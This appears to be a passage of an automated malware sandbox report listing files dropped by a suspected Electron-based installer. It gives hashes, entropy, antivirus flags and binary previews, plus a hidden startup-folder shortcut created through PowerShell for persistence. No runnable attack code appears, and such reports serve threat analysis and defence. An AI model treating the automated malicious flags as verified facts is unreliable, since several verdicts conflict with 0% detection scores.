                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):491017
                                                                                                                                                                                            Entropy (8bit):6.696102855635661
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:IpP3caOCTyemy5JPFW2uHu4u0JU52UznMi4LnKeze9Tk:qXvmOWzu0JU52UznUeC
                                                                                                                                                                                            MD5:0BE25A48EECEE48F428FE56FBFA683FD
                                                                                                                                                                                            SHA1:94C0E8C99BEB592EBAB9EA5B8758AA414BBE7048
                                                                                                                                                                                            SHA-256:A5E276BDFE4CF87832EEE153596CCDE9CF9193E81F29A4295C8335525DA64295
                                                                                                                                                                                            SHA-512:423033E67654820AB9F9773F45F70908511AEB8228C59126757885E0BBE0BD960257324D405D27526D61B541B1E6323DE16BEF29D4DCB94F39FD5E92FA811CC8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........'..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.&...v.[...w.....y.....z.....|.....}.4.....].....b.....j.....r.....y.....................................................8.......................T.......................@.......................<.......................$.....y.......................J.....k.....x...........(.....N.....h...........%.....T.....i.................J.....W.................(.....4................./.....A.................W.....i.................. ..... ....g ..... ..... ..... ..../!....~!.....!.....!....."....X"....."....."....."....5#....^#....j#.....#.....$....M$....Y$.....$.....$....'%....0%.....%.....%.....&.....&....t&.....&.....'.....'....j'.....'.....'.....'....0(....v(.....(.....(....J)....t).....).....)....3*....d*.....*.....*.....+....!+....-+.....+.....+.....+.....,....s,.....,.....,.....-....|-.....-....=.....L............/....S/....h/...../.....0....G0....S0.....0.....0.....0.....0....M1.....1.....1.....1....=2.....2

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\resources.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5755390
                                                                                                                                                                                            Entropy (8bit):7.996220000544904
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:98304:JZ5ti6+nkrht455GGPeenn0mJSwLEpxIvMi8rwrGU3nAaqdkmYAzFKwR4:j7ilnkrP455GGHnhEXU8kr1Xqdf1FvG
                                                                                                                                                                                            MD5:6772B597BF68622D934F207570E771B1
                                                                                                                                                                                            SHA1:F2A80FBFA034CB1FA07DC9AA37BF9F5B2280FF13
                                                                                                                                                                                            SHA-256:268DE4D99AB7C4F4EE32C8E8CB2B058A2C8D0D839F468AE8E8C0605FEAA736EA
                                                                                                                                                                                            SHA-512:A2BE67DF09951C9EF9200DCCCBDFF13736921522191F0001DA539D5C7F26B5B26A6B810BE6963908F216768C98D21E52486C7E00538CC0730E8C78E78811B85B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:............f..#..{.V...|.*1..~..4....OG....aI................V...........@..............................................D9....Dc....D.....D.....D.....D.....D,....D" ...D*$...D.$..HE.$..IE.(..JEx*..SE-/..TE.8..UE.G..VE.h..\E.q..]E.r..^E.s..`E*t..aEty..bE....cExo..dE.Z..eE.[...E.\...E.m...Eho...Exs...E.u...E.{...E.....E....E.....E.....E[....E....EV....E.....E.....E7....E.....E.....E2....E.....L9....L.....L.....L+....LP....L.....L(.../Lo...0L5...1L,)..2L.3...Q.D...Q.P...QdY...Q.\...Q._...Q.j...Q.k...Q.l...QAn...Q.....Q.....R.....R....ZdA&..[d"(..\d:=..]d.@..^dpA.._d3D..`d.G..adqI...d.T...d.Y...d._...d.m...d.p...dUu...d.v...d.x...d.y...d.|...d;....d....6eL...7e|...8e...9e5...:e....;e....<e....=e....>e#...?e....@eo...Ae....Be=...Cex....gp....ga0...g.2.....3.....6.....*....X+.....2.....2.....4.....9.....L....K...........a.....g.....9.....Y.................7... .>...<..L..=..M..>..S..?..X..@.cZ..B.]g..C..i..D..s..E..v..F..w..G.i...H.....I.....J.....K.]...L.....M.....N.S...O._...P.L...Q...

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\resources\app.asar

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):11404197
                                                                                                                                                                                            Entropy (8bit):6.454983757670651
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:7M8gj5wrFTmZcpzeLWz8TSfmxfv05Qvl9Hu1fBWfzbnWw+uH20Nmq:7q5wrFTmZcp6xSkFleWfzbWwu0Nm
                                                                                                                                                                                            MD5:32DA5BCDA2877B98357BABD2E841822D
                                                                                                                                                                                            SHA1:8DFB2C1A358E737BDAC4FC3C19FA5B1B3C8629C8
                                                                                                                                                                                            SHA-256:7C05878E83FAEDEF9A95156D12D674F7B69DA8F9CC45CEA1C68C1698ACF1FA38
                                                                                                                                                                                            SHA-512:B7D62EC67257832D7E4C18339AEBED9C0432CD1D9307EB020146195263645F1CDE60FF83E55BE5414A7189F9ECD51E52A5EB2F17B4B467539A1B1EF62AC50D05
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:....4+..0+..++..{"files":{"node_modules":{"files":{"@babel":{"files":{"generator":{"files":{"LICENSE":{"size":1106,"integrity":{"algorithm":"SHA256","hash":"117da2af0d4ce0fe1c8e19b5cff9dcd806adf973d328d27b11d4448c4ff24f76","blockSize":4194304,"blocks":["117da2af0d4ce0fe1c8e19b5cff9dcd806adf973d328d27b11d4448c4ff24f76"]},"offset":"0"},"lib":{"files":{"buffer.js":{"size":5771,"integrity":{"algorithm":"SHA256","hash":"49d70448373ee7293d57c661383f44e86174059be60d2f8fb98969ae97f16e5e","blockSize":4194304,"blocks":["49d70448373ee7293d57c661383f44e86174059be60d2f8fb98969ae97f16e5e"]},"offset":"1106"},"generators":{"files":{"base.js":{"size":2294,"integrity":{"algorithm":"SHA256","hash":"fb4891bbcaf0f27846b193500bc944213e7cbf2c0feb282795b153d70282e000","blockSize":4194304,"blocks":["fb4891bbcaf0f27846b193500bc944213e7cbf2c0feb282795b153d70282e000"]},"offset":"6877"},"classes.js":{"size":4157,"integrity":{"algorithm":"SHA256","hash":"7f9a3208c888e8ef986bf7cb79a5143fd8bb51308ca17bad9e0a5be0c5251

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\resources\elevate.exe

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):107520
                                                                                                                                                                                            Entropy (8bit):6.442687067441468
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:1bLnrwQoRDtdMMgSXiFJWcIgUVCfRjV/GrWl:1PrwRhte1XsE1l
                                                                                                                                                                                            MD5:792B92C8AD13C46F27C7CED0810694DF
                                                                                                                                                                                            SHA1:D8D449B92DE20A57DF722DF46435BA4553ECC802
                                                                                                                                                                                            SHA-256:9B1FBF0C11C520AE714AF8AA9AF12CFD48503EEDECD7398D8992EE94D1B4DC37
                                                                                                                                                                                            SHA-512:6C247254DC18ED81213A978CCE2E321D6692848C64307097D2C43432A42F4F4F6D3CF22FB92610DFA8B7B16A5F1D94E9017CF64F88F2D08E79C0FE71A9121E40
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..O..............h.......j.q.....k.....e......e......e.......zR........._...h......h.f.............h......Rich....................PE..L......W............................l........0....@.......................................@....................................P.......x.......................T.......p...............................@............0..$............................text............................... ..`.rdata...k...0...l..................@..@.data...............................@....gfids..............................@..@.rsrc...x...........................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\snapshot_blob.bin

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):316538
                                                                                                                                                                                            Entropy (8bit):4.177181507694743
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:p+JfFRciefJNlUMX2kIE1aOaVsS/3hYeFWYSITdJgClE+ceNTbM:pefPciePmMXh1aOCsy3hpFRlzVw
                                                                                                                                                                                            MD5:C8950B01F336B05609976546B1A007E6
                                                                                                                                                                                            SHA1:F04D0B0369007BBE6A7FE129B31B19DD1822F32F
                                                                                                                                                                                            SHA-256:9B3A75A713E41BC73F219858FCAC8E3031BA22732285ED3A64DC48074C725CC2
                                                                                                                                                                                            SHA-512:B7DB4277290E849A52AD5D31FF65AB5D2B75C2125D67EEEE02B09E4E7001AA46D10BF89429C65695C7560D1C45B898C20275EB9E36CD8B259707FFB8B298F103
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..........(.._.13.0.245.16-electron.0..........................................`L..............l....K..}.a........a........a2.......aj.......ad.......a<....................r........2.............R..............r........2...(Jb...-Q.....@...^.M..Q.`.....(Jb...1U.....@...^..`.....H...IDa........Db............D`.....I.D`......]D....Da..........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.....................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\v8_context_snapshot.bin

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):687473
                                                                                                                                                                                            Entropy (8bit):5.155441647860749
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:vPYRCOn2E6keR1PciePmMXh1aOCsy3hbHRlEDMrVkSiF01gwoHZHCvqmO9iXz8pk:vPY5nnbe3WZBr/iXo73nVE+2l
                                                                                                                                                                                            MD5:BF2976DA5086B48D74EB36F56F5DEB83
                                                                                                                                                                                            SHA1:5AA7669A3E2166FDD7534241A0E7A9BD3FF5748B
                                                                                                                                                                                            SHA-256:9F1614328E18BECB4ADF96DE98BC91CE2A69274ABE6621327CC0FC8503A1AB20
                                                                                                                                                                                            SHA-512:C44DEEB96597B4498604ECF2060EE0520E84A00308CA1F47FFDF8E3ED3E676B27B622FF7DBD4B6F1A14CE60B05CC2AD9B8D7562BB362C1B12A885EA7FBE50E0A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:...........a.na.13.0.245.16-electron.0..............................................!...i...1...q.......l...x...}.a........a........a........aj.......ad.......a<....................r........2.............R..............r........2...(Jb...-Q.....@...^.M..Q.`.....(Jb...1U.....@...^..`.....H...IDa........Db............D`.....I.D`......]D....Da..........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.............................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\vk_swiftshader.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5533184
                                                                                                                                                                                            Entropy (8bit):6.341413194477468
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:zBVtMrKyOsxYYAKDsJS86IxORjgUlC3K/FAz4gdm6o4oX7uh5LC6MW4LY67h772c:jWKyOEnOnoLrWbfDiN9isC
                                                                                                                                                                                            MD5:6720D5DCDA6737EB0CC5A352A47414DC
                                                                                                                                                                                            SHA1:03D9A8E350F485DD955F7DEE06BFC46371753032
                                                                                                                                                                                            SHA-256:D8F36B089D83157ABC271D9FE125919C3237943FA9789A511AC5EF1D41E2E3AF
                                                                                                                                                                                            SHA-512:DE5ADE6CE14B14957FCE669C4181AF1E6A6F540798D1C6720B56FF281F813A6CE4446BDE33A8F175D2484E07F4911F93A773CAC1D372CBE3B26BE634B3FA1686
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........." ......B.........P.;.......................................U...........`A..........................................O.......O.P....PU.......S..W...........`U.......O......................O.(.....B.@.............P.8............................text...g.B.......B................. ..`.rdata........B.......B.............@..@.data...H.....P.......P.............@....pdata...W....S..X...VR.............@..@.gxfg...0.....T..0....S.............@..@.retplne..... U.......S..................tls....Y....0U.......S.............@..._RDATA.......@U.......S.............@..@.rsrc........PU.......S.............@..@.reloc.......`U.......S.............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\vk_swiftshader_icd.json

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):106
                                                                                                                                                                                            Entropy (8bit):4.724752649036734
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YD96WyV18tzsmyXLVi1rTVWSCwW2TJHzeZ18rY:Y8WyV18tAZLVmCwXFiZ18rY
                                                                                                                                                                                            MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                                                                                                                                            SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                                                                                                                                            SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
                                                                                                                                                                                            SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\vulkan-1.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):894976
                                                                                                                                                                                            Entropy (8bit):6.60309283089771
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:FhJnfYUcguY3cTAL6Z5WjDYsHy6g3P0zAk7TNb:FhVrXN3oAL6Z5WjDYsHy6g3P0zAk7T
                                                                                                                                                                                            MD5:B6D3AF84E8BE0027741AA6077768789E
                                                                                                                                                                                            SHA1:E525F2434DC56F79644695F5841E91DD5F80EEC4
                                                                                                                                                                                            SHA-256:376FF6892EC7B406ACD8C455AC82F8541E59E3757195488FF04CD9F20D554562
                                                                                                                                                                                            SHA-512:F03B8792A740679C8A1A8CE0615B7876CC811130085F3FFB42182E0CB846519603804DA97FC93A8ABEBEE01E03FD257DF289C54575DA8FAAAD018F4F4BAE606A
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........." .........................................................@............`A........................................PL..<!...m..P.... .......P..ha...........0..$....:.......................9..(.......@............q...............................text............................... ..`.rdata..............................@..@.data....L......."..................@....pdata..ha...P...b..................@..@.gxfg....%.......&...j..............@..@.retplne.................................tls................................@..._RDATA..............................@..@.rsrc........ ......................@..@.reloc..$....0......................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\SpiderBanner.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):9216
                                                                                                                                                                                            Entropy (8bit):5.5347224014600345
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:5lkE3uqRI1y7/xcfK4PRef6gQzJyY1rpKlVrw:5lkMBI1y7UKcef6XzJrpKY
                                                                                                                                                                                            MD5:17309E33B596BA3A5693B4D3E85CF8D7
                                                                                                                                                                                            SHA1:7D361836CF53DF42021C7F2B148AEC9458818C01
                                                                                                                                                                                            SHA-256:996A259E53CA18B89EC36D038C40148957C978C0FD600A268497D4C92F882A93
                                                                                                                                                                                            SHA-512:1ABAC3CE4F2D5E4A635162E16CF9125E059BA1539F70086C2D71CD00D41A6E2A54D468E6F37792E55A822D7082FB388B8DFECC79B59226BBB047B7D28D44D298
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../../../..Wy./../../....../..Wi./..Wx./..W~./..W{./..Rich./..................PE..L...T{mW...........!................p!.......0...............................p............@..........................5..o...l1..P....P.......................`.......................................................0...............................text............................... ..`.rdata.......0......................@..@.data........@......................@....rsrc........P......................@..@.reloc..d....`....... ..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):102400
                                                                                                                                                                                            Entropy (8bit):6.729923587623207
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:WNuZmJ9TDP3ahD2TF7Rq9cJNPhF9vyHf:WNuZ81zaAFHhF9v
                                                                                                                                                                                            MD5:C6A6E03F77C313B267498515488C5740
                                                                                                                                                                                            SHA1:3D49FC2784B9450962ED6B82B46E9C3C957D7C15
                                                                                                                                                                                            SHA-256:B72E9013A6204E9F01076DC38DABBF30870D44DFC66962ADBF73619D4331601E
                                                                                                                                                                                            SHA-512:9870C5879F7B72836805088079AD5BBAFCB59FC3D9127F2160D4EC3D6E88D3CC8EBE5A9F5D20A4720FE6407C1336EF10F33B2B9621BC587E930D4CBACF337803
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q....C...C...C...C...C...C...C...C...C...C...C...C...C.[.C...C.[.C...C.[.C...C.[.C...CRich...C........................PE..L...I..[...........!.....*...b...............@.......................................+....@..........................}..d....t..........X............................................................................@...............................text....).......*.................. ..`.rdata..TC...@...D..................@..@.data...l............r..............@....rsrc...X............x..............@..@.reloc..j............~..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\System.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):12288
                                                                                                                                                                                            Entropy (8bit):5.719859767584478
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                                                                                                            MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                                                                                                            SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                                                                                                            SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                                                                                                            SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\app-64.7z

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:7-zip archive data, version 0.4
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):83565607
                                                                                                                                                                                            Entropy (8bit):7.999996162121266
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:1572864:B2/ebAbW6FLl4oabh+XJhXhQiB1dJdYVkq7U4hmfixR8:d0bthlXOh01VJY+qw0ui38
                                                                                                                                                                                            MD5:44FCFC40B0664FA0916283B8CB16037A
                                                                                                                                                                                            SHA1:1FA51EBFF14BB687D236AB292B716BE1B65F3F81
                                                                                                                                                                                            SHA-256:4FF85E7082475331BDC1DF02A514C2A94D60AF5E91974352C5BFB31EDD056670
                                                                                                                                                                                            SHA-512:C16E179466620037CDC804EE160FA0E68A1CF3D44CA03F452E3A822F0FE19D8ED2FBF6FA94EB1F9DCD5969DE2030A836AD7D021D0A05DE0B27BF5F2E066BDD65
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:7z..'...J.O.........%.......5.6.....]...6.....#.0@.1.zL..[...4b ...A....Z7.~...........}.......m.7!*Q..X,s..T...>~(|.s..%...1`.Yw......vK.Tz.|pu.96...D.......w,2PO;I..Z.{..I..y.pn...P..*G.a...Z...(....R..R8|.\....L...k..}..s&.'.....0.."o.s.ZI.=.(.C.?.Gg...|..^....;.e[.w....<.n.@..&Z...$`p ..OzD...V..r.l...ibH..hv."6.m.5.T{*4nh.....Sx.G..1.'.....8.."..................Zk!`.fd..qN.....{.......O.$.|r.{.a|^.]..K*n..t..e.......o.s.v}.....2[M..1..yG..]Y. ...Z=....?.\#*..)...!k...X....G.%>......t..7.}.G.~HV..D.[.....4....!.....=.r.../P.5*..j1^.!..W).!...J.!H0....Rj..[..0.y.u...5..bC...\..{...Cv...`xN|....2m.A.{..m..y).*B.q.D.y...j.\.R#.CX\n..L>.NN.]..cj{>..p.j}.&..Z<.`7....o.......k..z.. ...?..~g.|m....kysn.q.., b>'.:,p...... .......V..x........0j.......F..3....W.......xO.....w.q..a....s.4#.GWP.........r'...K....+_^"0T=.+.....u)......xEP.Il.}.P>.@{.9{.......*...Q..E..[..[34..wx....Z...$..U.....vg....k.......Z.$j....#.b.rF....#5...XO.u...saZ...'.

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\nsExec.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6656
                                                                                                                                                                                            Entropy (8bit):5.155286976455086
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:YjHFiKaoggCtJzTlKXb0tbo68qD853Ns7GgmkNq3m+s:JbogRtJzTlNR8qD85uGgmkNr
                                                                                                                                                                                            MD5:EC0504E6B8A11D5AAD43B296BEEB84B2
                                                                                                                                                                                            SHA1:91B5CE085130C8C7194D66B2439EC9E1C206497C
                                                                                                                                                                                            SHA-256:5D9CEB1CE5F35AEA5F9E5A0C0EDEEEC04DFEFE0C77890C80C70E98209B58B962
                                                                                                                                                                                            SHA-512:3F918F1B47E8A919CBE51EB17DC30ACC8CFC18E743A1BAE5B787D0DB7D26038DC1210BE98BF5BA3BE8D6ED896DBBD7AC3D13E66454A98B2A38C7E69DAD30BB57
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L....~.\...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\nsis7z.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):434176
                                                                                                                                                                                            Entropy (8bit):6.584811966667578
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:aUWQQ5O3fz0NG3ucDaEUTWfk+ZA0NrCL/k+uyoyBOX1okfW7w+Pfzqibckl:an5QEG39fPAkrE4yrBOXDfaNbck
                                                                                                                                                                                            MD5:80E44CE4895304C6A3A831310FBF8CD0
                                                                                                                                                                                            SHA1:36BD49AE21C460BE5753A904B4501F1ABCA53508
                                                                                                                                                                                            SHA-256:B393F05E8FF919EF071181050E1873C9A776E1A0AE8329AEFFF7007D0CADF592
                                                                                                                                                                                            SHA-512:C8BA7B1F9113EAD23E993E74A48C4427AE3562C1F6D9910B2BBE6806C9107CF7D94BC7D204613E4743D0CD869E00DAFD4FB54AAD1E8ADB69C553F3B9E5BC64DF
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L.6a..X2..X2..X2m.[3..X2m.]3..X2Z.]3+.X2Z.\3..X2Z.[3..X2m.\3..X2m.Y3..X2..Y2..X2..\3#.X2..]3..X2..X3..X2...2..X2...2..X2..Z3..X2Rich..X2........PE..L.....\...........!......................... ...............................@............@..........................6.......7..d................................E.....................................@............ ...............................text............................... ..`.rdata..8"... ...$..................@..@.data........P... ...6..............@....rsrc................V..............@..@.reloc...E.......F...Z..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 6 15:33:53 2024, mtime=Fri Dec 6 15:34:02 2024, atime=Tue Nov 26 03:14:48 2024, length=188826112, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1152
                                                                                                                                                                                            Entropy (8bit):4.955682296991906
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:8ploH/EtRkaUt5zKanloAhhjAYfrAoGCe7JTqyFm:8G/2RVUtBnhhEM8oGCecyF
                                                                                                                                                                                            MD5:262D422B510221D09CE3B30185FC9175
                                                                                                                                                                                            SHA1:E7F4AA5FF67A69666D61B7BCF29CAA40E68599BE
                                                                                                                                                                                            SHA-256:CE21885412CED4ECD91132F9836B62E4BF2A58AE93AAFD2FBBDDF53B74EC78BD
                                                                                                                                                                                            SHA-512:86698C6564E31E093ACC1DFAE2AAF29B500242E222E56428974E13619761394CA0D379297630B192CFDB6C06A8DEBC00E6FFA2D595CD90212A5A802B23B8DEB2
                                                                                                                                                                                            Malicious:true
